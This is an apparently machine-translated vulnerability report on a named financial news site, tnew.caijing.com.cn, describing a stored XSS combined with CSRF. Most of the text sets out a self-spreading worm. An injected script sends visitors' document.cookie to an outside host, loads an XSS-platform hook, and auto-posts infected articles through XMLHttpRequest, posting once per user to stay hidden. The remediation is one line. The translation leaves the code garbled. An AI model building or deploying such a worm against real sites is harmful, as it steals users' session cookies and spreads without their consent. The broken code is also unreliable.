Caijing website XSS Worm

Caijing website XSS Worm

Worm = XSS + csrf
 

Address: http://tnew.caijing.com.cn/


First post the post, directly post four parameters without token verification, resulting in a csrf vulnerability.
 

 

After reading the stored XSS, the post content is not filtered, resulting in XSS.
 

 

Next, enter the worm obscenity status:

------------------------------

If you insert <script src = 'HTTP: // wooyun.org/test.js'>



The content of test. js is:

// Introduce automatic post to spread the worm jsdocument. write ('<script src = "http://wooyun.org/fatie.php? Cookie = '+ document. cookie + '"> <\/script>'); // introduce js files on the xss receiving platform, such as beefdocument. write ('<script src = "http://wooyun.org/xss.js"> <\/script> ');

In this way, the request will automatically post the js and the js of the xss platform.



When users access web page introduction: http://wooyun.org/fatie.php? Cookie = (cookie content)



The content of fatie. php can be roughly like this.

Cmstop_username in the website cookie has a user name, from the cookie content transmitted to the database to check whether the worm is in progress for the first time. If this is the first time, the user name is written to the database to prevent repeated posting after the worm occurs. The website returns a js action that performs Automatic posting. The returned js Code is roughly as follows: // the title and content of the article can be collected and stored in the database using php, send different articles to infected with each worm to infect other people with var title = "url-encoded title content"; var content = "url-encoded article content with xss code "; if (window. XMLHttpRequest) {var x = new XMLHttpRequest ();} else {var MSXML = new Array ('msxml2. XMLHTTP.5.0 ', 'msxml2. XMLHTTP.4.0 ', 'msxml2. XMLHTTP.3.0 ', 'msxml2. XMLHTTP ', 'Microsoft. XMLHTTP '); for (var n = 0; n <MSXML. length; n ++) {try {var objXMLHTTP = new ActiveXObject (MSXML [n] ); Break;} catch (e) {}} objXMLHTTP. open ("POST", "http://tnew.caijing.com.cn/Articles/add", false); objXMLHTTP. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); objXMLHTTP. setRequestHeader ("Connection", "Keep-Alive"); objXMLHTTP. send ("title =" + title + "& content =" + content + "& g_name = % E5 % 90% E6 % A7 % BD & g_id = 4 & cate_id = 23 & cate_name = % E6 % 97% A0 % E4 % B8 % BB % E9 % A2 % 98 "); in this way, the spread of xss is realized. Different people send only one post to hide the xss worm.

As for xss. js, simply introduce the xss platform.

  Solution:

Enhanced Filtering